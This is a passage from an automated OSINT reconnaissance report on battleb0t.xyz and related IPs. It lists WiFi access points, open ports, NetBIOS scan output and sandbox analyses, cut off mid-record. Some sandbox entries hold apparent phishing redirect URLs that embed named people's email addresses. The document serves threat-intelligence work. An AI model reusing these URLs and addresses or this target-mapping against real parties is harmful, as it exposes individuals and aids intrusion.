ef:72:1d:69:74:95:fd:0a:84:bd:b8:b9:3c:12:87:d3:eb:2d:
b5:d2:63:2a:29:60:59:c4:11:1c:0f:c3:fb:79:2f:8a:43:57:
38:62:d8:2e:68:34:bb:6c:0e:7a:e3:f8:3d:f5:c1:05:a5:6d:
93:b9:b3:48:22:8e:a3:39:66:e6:a5:9e:dc:e2:98:35:7e:b3:
e1:c7:b2:16:b7:b0:2e:70:50:4e:ea:93:d0:f8:5c:69:6c:1b:
d2:3e:ee:da:64:1f:ad:97:c8:be:17:38:a6:ed:92:9e:3b:db:
67:c8:b0:5f:e6:af:fd:f7:57:92:7b:87:3d:bf:c4:c1:21:13:
ba:c4:d8:85:a3:63:dc:90:ee:df:3d:2a:bc:03:4e:ba:1b:8c:
0c:16:7e:58:e3:ac:7f:dc:3b:40:18:1f:74:98:d5:c4:fa:32:
99:95:a0:64:1e:5b:4d:a8:f5:79:33:2e:3f:43:dc:8d:0e:7d:
28:25:74:7a:93:27:53:2e:6b:ae:4d:81:c1:3c:e0:cd:42:02:
6d:fc:da:f3:52:57:d5:b1:70:8e:1a:91:15:c8:1b:93:cd:40:
b8:ff:29:e7:c6:05:ad:63:8c:c8:ec:d7:e9:88:33:a3:5d:43:
a1:d5:b9:20
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | AUMWLAN (Net ID: 00:02:2D:1F:4C:85) | 50.1188, 8.6843 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 3126416304 (Net ID: 00:01:03:7B:F5:4B) | 41.8781, -87.6298 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Cracked (Category: social)
https://www.cracked.com/members/login | login |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2082 | 87.248.157.102 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.253): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:58:32 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://planningpokeronline.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_1e4_IESQMMUTEX_0_519"\n "IsoScope_1e4_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_1e4_IE_EarlyTabStart_0xd2c_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_1e4_ConnHashTable<484>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_1e4_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab475D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab46BF.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "6AFCP6RJ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6AFCP6RJ.txt]- [targetUID: 00000000-00000484]\n Dropped file: "KYOQ4GIQ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KYOQ4GIQ.txt]- [targetUID: 00000000-00003456]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsplanningpokeronline.com" has type "HTML document UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "~DF57DB14006E50F0E5.TMP" has type "data"- Location: [%TEMP%\\~DF57DB14006E50F0E5.TMP]- [targetUID: 00000000-00000484]\n "Cab475D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab475D.tmp]- [targetUID: 00000000-00003456]\n "RecoveryStore._DE97F9DD-7012-11ED-8A21-080027C90619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003456]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFC805A7001878EE75.TMP" has type "data"- Location: [%TEMP%\\~DFC805A7001878EE75.TMP]- [targetUID: 00000000-00000484]\n "~DF74F4EB885327EEE5.TMP" has type "data"- Location: [%TEMP%\\~DF74F4EB885327EEE5.TMP]- [targetUID: 00000000-00000484]\n "6AFCP6RJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6AFCP6RJ.txt]- [targetUID: 00000000-00000484]\n "_DE97F9DF-7012-11ED-8A21-080027C90619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "Tar475E.tmp" has type "data"- Location: [%TEMP%\\Tar475E.tmp]- [targetUID: 00000000-00003456]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "Cab46BF.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab46BF.tmp]- [targetUID: 00000000-00003456]\n "~DFA5F0ABB14A6E6D02.TMP" has type "data"- Location: [%TEMP%\\~DFA5F0ABB14A6E6D02.TMP]- [targetUID: 00000000-00000484]\n "_E9B6B1A0-7012-11ED-8A21-080027C90619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003456]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://planningpokeronline.com/"\n Pattern match: "https://planningpokeronline.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63865b7cd5844423476081fd', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.74.170.74'], u'sha256': u'ee2b3005a67dc45a60a0bc2947c2bfd8584632d9366ff2363f99250eefc18ee6', u'sha512': u'30cd14ddec6b724ae48ed2a119893fc317f3712fbf68421011c0f821b530e5f010a45a9278791619284396b908268be95648fb2255dd7077f478e9c1512bb886', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://planningpokeronline.com/', u'submission_id': u'63865b7cd5844423476081fe', u'created_at': u'2022-11-29T19:20:28+00:00', u'filename': None}], u'analysis_start_time': u'2022-11-29T19:20:28+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'28f8b4c39853b6bc34686712011e8493', u'network_mode': u'default', u'processes': [], u'sha1': u'f1fdac605e322d6ca2a758956f47506607dad35c', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 34.74.170.74 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000000014286.github.io]
https://www.openphish.com/feed.txt | 000000014286.github.io |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | villagio (Net ID: 00:01:24:F0:87:66) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 188.114.97.1 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5c5df87c1e1957-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:C6:10:31) | 39.0469, -77.4903 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo07501 (Net ID: 00:0C:F6:5C:1D:4D) | 50.8897, 6.0563 |
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 003marek.github.io |
| 2023-05-12 02:44:05 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-25 03:02:52 | battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Naver (Category: social)
https://blog.naver.com/login | login |
| 2023-05-12 02:46:02 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29415, United States, North America | 35.229.48.116 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_2.jpeg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:36:07 | Open UDP Port Information | No | Tool - nbtscan | 0 | 0 | 4 | 0 | None | NetBIOS Name Table for Host 45.131.109.53:
Incomplete packet, 155 bytes long.
Name Service Type
----------------------------------------
70724-04381 <20> UNIQUE
70724-04381 <00> UNIQUE
WORKGROUP <00> GROUP
Adapter address: c4:37:72:0f:5e:ba
| 45.131.109.53:137 |
| 2023-05-12 02:46:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://github.com/facebook/regenerator/blob/main/license', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 29, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fapollomech.com%2Fsara.selle%40apollomech.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6876:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6876:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6876:120:WilError_01"\n "SM0:5744:120:WilError_01"\n "Local\\SM0:5744:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:5744:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:6876:304:WilStaging_02"\n "SM0:6876:120:WilError_01"\n "SM0:6876:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6876:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.43.150:443"\n "172.67.212.13:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "142.251.46.228:443"\n "172.67.71.45:443"\n "142.250.189.227:443"\n "172.217.164.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "dev.protektnet.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fapollomech.com%2Fsara.selle%40apollomech.com" as clean (type is "HTML document ASCII text")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fapollomech.com%2Fsara.selle%40apollomech.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping6876_869169848\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00006876]\n "strings.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping6876_869169848\\json\\i18n-shared-components\\ja\\strings.json]- [targetUID: 00000000-00006876]\n "a8ce5196df51c32c_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\a8ce5196df51c32c_0]- [targetUID: 00000000-00006876]\n "Session_13323203029743627" has type "data"- [targetUID: N/A]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00006876]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00007564]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00006876]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\manifest.fingerprint]- [targetUID: 00000000-00006876]\n "f_00023d" has type "gzip compressed data max compression original size modulo 2^32 411849"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00007564]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "Part-IT" has type "data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping6876_1661340083\\Part-IT]- [targetUID: 00000000-00006876]\n "data_2" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006876]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00006876]\n "2aab480a-d616-460d-a587-6a093b98b3e9.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\2aab480a-d616-460d-a587-6a093b98b3e9.tmp]- [targetUID: 00000000-00006876]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fapollomech.com%2Fsara.selle%40apollomech.com"\n Pattern match: "https://github.com/facebook/regenerator/blob/main/LICENSE"\n Heuristic match: "1000logos.net"\n Pattern match: "https://track.salesflare.com/flare.js"\n Heuristic match: "api.salesflare.com"\n Heuristic match: "dev.protektnet.com"\n Pattern match: "https://dev.protektnet.com/MNU/site.php"\n Pattern match: "https://llink.to"\n Heuristic match: "stackpath.bootstrapcdn.com"\n Heuristic match: "track.salesflare.com"\n Pattern match: "https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/13/2/static/css/main.64d85253.css,static_js_url:https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/13/2/static/js/main.f389f055.js,static_version:53},edge_reward"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 172.67.212.13"\n "UDP connection to 142.251.46.228"\n "UDP connection to 142.250.189.227"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.43" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.43"\n Potential IP "10.34.0.43" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.43\\LICENSE"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma"'}], u'threat_level': 0, u'size': None, u'job_id': u'640f5f84dbc6ba518703abfa', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', | 185.199.111.153 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | ebrahemsamir.github.io | 185.199.111.153 |
| 2023-05-12 02:53:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 29, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7008:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7008:120:WilError_01"\n "SM0:6264:120:WilError_01"\n "Local\\SM0:6264:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:6264:120:WilError_01"\n "Local\\SM0:7008:120:WilError_01"\n "SM0:7008:304:WilStaging_02"\n "Local\\SM0:7008:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7008:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7008:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.40.106:443"\n "102.37.125.193:443"\n "35.186.254.174:443"\n "142.250.191.68:443"\n "104.18.11.207:443"\n "104.26.9.175:443"\n "142.250.189.195:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "fonts.gstatic.com"\n "llink.to"\n "stackpath.bootstrapcdn.com"\n "tamannigeria.org"\n "track.salesflare.com"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com" as clean (type is "HTML document ASCII text")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\MICROSOFT EDGE.LNK"\n "msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk"\n "msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', 